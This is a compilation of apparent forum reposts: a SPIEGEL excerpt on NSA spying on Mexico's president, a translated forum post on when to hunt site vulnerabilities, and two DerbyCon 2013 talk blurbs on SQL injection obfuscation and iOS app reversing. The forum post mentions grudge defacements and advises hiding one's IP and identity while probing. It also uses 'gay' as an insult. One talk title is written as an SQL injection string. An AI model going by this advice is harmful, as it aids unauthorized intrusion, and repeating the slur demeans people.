In the space of a single year, according to the internal documents, this operation produced 260 classified reports that allowed US politicians to conduct successful talks on political issues and to plan international investments. The tone of the document that lists the NSA's "tremendous success" in monitoring Mexican targets shows how aggressively the US intelligence agency monitors its southern neighbor. "These TAO accesses into several Mexican government agencies are just the beginning -- we intend to go much further against this important target," the document reads. It goes on to state that the divisions responsible for this surveillance are "poised for future successes." While these operations were overseen from the NSA's branch in San Antonio, Texas, secret listening stations in the US Embassies in Mexico City and Brasília also played a key role. The program, known as the "Special Collection Service," is conducted in cooperation with the CIA. The teams have at their disposal a wide array of methods and high-tech equipment that allow them to intercept all forms of electronic communication. The NSA conducts its surveillance of telephone conversations and text messages transmitted through Mexico's cell phone network under the internal code name "Eveningeasel." In Brasília, the agency also operates one of its most important operational bases for monitoring satellite communications. This summer, the NSA took its activities to new heights as elections took place in Mexico. Despite having access to the presidential computer network, the US knew little about Enrique Peña Nieto, designated successor to Felipe Calderón. Spying on Peña Nieto In his campaign appearances, Peña Nieto would make his way to the podium through a sea of supporters, ascending to the stage like a rock star. He is married to an actress, and also had the support of several influential elder statesmen within his party, the PRI. 
He promised to reform the party and fight pervasive corruption in the country. But those familiar with the PRI, which is itself regarded by many as corrupt, saw this pledge as little more than a maneuver made for show. First and foremost, though, Peña Nieto promised voters he would change Mexico's strategy in the war on drugs, announcing he would withdraw the military from the fight against the drug cartels as soon as possible and invest more money in social programs instead. Yet at the same time, he assured Washington there would be no U-turn in Mexico's strategy regarding the cartels. So what were Peña Nieto's true thoughts at the time? What were his advisers telling him? The NSA's intelligence agents in Texas must have been asking themselves such questions when they authorized an unusual type of operation known as structural surveillance. For two weeks in the early summer of 2012, the NSA unit responsible for monitoring the Mexican government analyzed data that included the cell phone communications of Peña Nieto and "nine of his close associates," as an internal presentation from June 2012 shows. Analysts used software to connect this data into a network, shown in a graphic that resembles a swarm of bees. The software then filtered out Peña Nieto's most relevant contacts and entered them into a databank called "DishFire." From then on, these individuals' cell phones were singled out for surveillance. According to the internal documents, this led to the agency intercepting 85,489 text messages, some sent by Peña Nieto himself and some by his associates. This technology "might find a needle in a haystack," the analysts noted, adding that it could do so "in a repeatable and efficient way." It seems, though, that the NSA's agents are no longer quite as comfortable expressing such pride in their work. 
Asked for a comment by SPIEGEL, the agency replied: "We are not going to comment publicly on every specific alleged intelligence activity, and as a matter of policy we have made clear that the United States gathers foreign intelligence of the type gathered by all nations. As the President said in his speech at the UN General Assembly, we've begun to review the way that we gather intelligence, so that we properly balance the legitimate security concerns of our citizens and allies with the privacy concerns that all people share." Meanwhile, the NSA's spying has already caused considerable political damage in the case of Brazil, seriously denting the mutual trust between Rousseff and Obama. Brazil now plans to introduce a law that will force companies such as Google and Facebook to store their data inside Brazil's borders, rather than on servers in the US, making these international companies subject to Brazilian data privacy laws. The Brazilian government is also developing a new encryption system to protect its own data against hacking. So far, Mexico has reacted more moderately -- although the fact that the NSA infiltrated even the presidential computer network wasn't known until now. Commenting after TV Globo first revealed the NSA's surveillance of text messages, Peña Nieto stated that Obama had promised him to investigate the accusations and to punish those responsible, if it was found that misdeeds had taken place. In response to an inquiry from SPIEGEL concerning the latest revelations, Mexico's Foreign Ministry replied with an email condemning any form of espionage on Mexican citizens, saying such surveillance violates international law. "That is all the government has to say on the matter," stated a spokesperson for Peña Nieto. Presumably, that email could be read at the NSA's Texas location at the same time. Source: NSA Hacked Email Account of Mexican President - SPIEGEL ONLINE
-
Why are you looking for vulnerabilities in those sites? Are you bored? That's not a valid reason. In practice, you don't look for problems in "any" site, you look in specific sites. If it doesn't matter to you which site you find something in, whether it's XSS, SQLi or anything else, it means you're gay. You look for problems in the following cases:

1. In a site with a Bug Bounty, i.e. to make money
2. When the owners of the sites give you permission (in writing) to do so
3. In a site where you think you've found interesting stuff, and in that case you keep your mouth shut and don't post on RST and don't email them either
4. In a site you have a grudge against, for example to take the piss out of Mircea Badea, i.e. a deface with "Muie" written in font size 72.
5. To show off what a big shot you are because you found SQLi in a site that maybe Gigel built after learning a little PHP, and to send the link to your friends to prove this theorem to them

Being bored or wanting to learn are not valid reasons, and the only accepted cases are the first 2; in the others you risk getting into trouble. If you want to do good deeds, know that it isn't worth it. If you really want to do it properly, send an email BEFORE, tell them you're passionate as fuck and that you want to see whether there are any problems and that you'll report them. If they accept, you do it. If they don't accept, you don't. And still, whichever of the cases above applies, I suggest you use "Tor" or anything else to hide your IP, that you don't report the problems from gigel.gheorghe@gmail.com where that's your real name, and that you don't post anywhere under a username you've attached your public details to. That's in general; if it's a small site nobody will care. The story is longer, you'll understand in time, preferably without getting into trouble over it.
-
Derbycon 2013 - ‘) Union Select `This_Talk` As (‘New Exploitation And Obfuscation Techniques’)%00 - Roberto Salgado

Description: “This talk will present some of the newest and most advanced optimization and obfuscation techniques available in the field of SQL Injections. These techniques can be used to bypass web application firewalls and intrusion detection systems at an alarming speed. This talk will also demonstrate these techniques on both open-source and commercial firewalls and present the ALPHA version of a framework called Leapfrog which Roberto is developing; Leapfrog is designed to assist security professionals, IT administrators, firewall vendors and companies in testing their firewall rules and implementation to determine if they are an adequate enough defense measure to stop a real cyber-attack. Many of the techniques that will be presented were created by Roberto Salgado and are currently some of the fastest methods of extracting information from a database through SQL Injections. Roberto will demonstrate how to reduce the amount of time it takes to exploit a SQL Injection by over a third of the time it would normally take. He will also demonstrate why firewalls and intrusion detection systems are not the ultimate solution to security and why other measures should also be implemented.”

Bio: “As an Information Security specialist, Roberto has always been passionate about his line of work and has had several years of experience researching and experimenting in this field. In saying this, Roberto’s expertise is brought forth by his continuing commitment to exploring the cutting edge of today’s security challenges, and finding solutions to these security problems. This driving passion has given him the opportunity to participate and contribute to great projects such as Modsecurity, PHPIDS, SQLMap and the Web Application Obfuscation book. He also created and maintains the SQL Injection Knowledge Base, an invaluable resource for penetration testers when dealing with SQL Injections. In his free time Roberto enjoys creating SQL Injection challenges for both the security community and himself to learn from. Additionally, Roberto enjoys programming in Python and has created projects like Panoptic, a penetration testing tool that automates the search and retrieval of common log and config files through LFI vulnerabilities.”

For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Source: Derbycon 2013 - ‘) Union Select `This_Talk` As (‘New Exploitation And Obfuscation Techniques’)%00 - Roberto Salgado
-
Derbycon 2013 - Ios.Reverse #=> Ipwn Apps - Mano ‘Dash4rk’ Paul

Description: While iOS apps downloaded from the AppStore are packaged in binary format and usually encrypted, there is a lot of information one can glean by reverse engineering iOS apps. This talk will cover reversing tools and techniques that can be used to reverse iOS apps to make them iPwn Apps.

Bio: Christian, Author (7 Qualities of Highly Secure Software and The Official Guide to the CSSLP), Advisor (Software Assurance), Biologist (Shark Researcher), Entrepreneur (SecuRisk Solutions), Founder (HackFormers), Security Professional and Shaolin Do Kung Fu student (Black belt)!

Formal: Mano ‘dash4rk’ Paul is a shark biologist turned security professional. He is the author of the acclaimed “7 Qualities of Highly Secure Software” and the “Official (ISC)2 Guide to the CSSLP.” He serves as the CEO of SecuRisk Solutions, which he founded after managing the AppSec program at Dell, and his InfoSec experience includes designing & developing security programs from compliance-to-coding, security in the SDLC, writing secure code, risk management, security strategy, and security awareness training & education. He also founded HackFormers, which is a Christian organization with the mission to Teach Security, Teach Christ and Teach Security in Christ. He is an invited speaker/panelist, delivering talks and keynotes at conferences such as RSA, OWASP AppSec, SANS, Security Congress, ASIS and Gartner Catalyst. Mr. Paul also serves as the software assurance advisor for (ISC)2 and is a member of the AppSec Advisory Board.

For More Information please visit : - DerbyCon : Louisville, Kentucky Derbycon 2013 Videos (Hacking Illustrated Series InfoSec Tutorial Videos) Source: Derbycon 2013 - Ios.Reverse #=> Ipwn Apps - Mano ‘Dash4rk’ Paul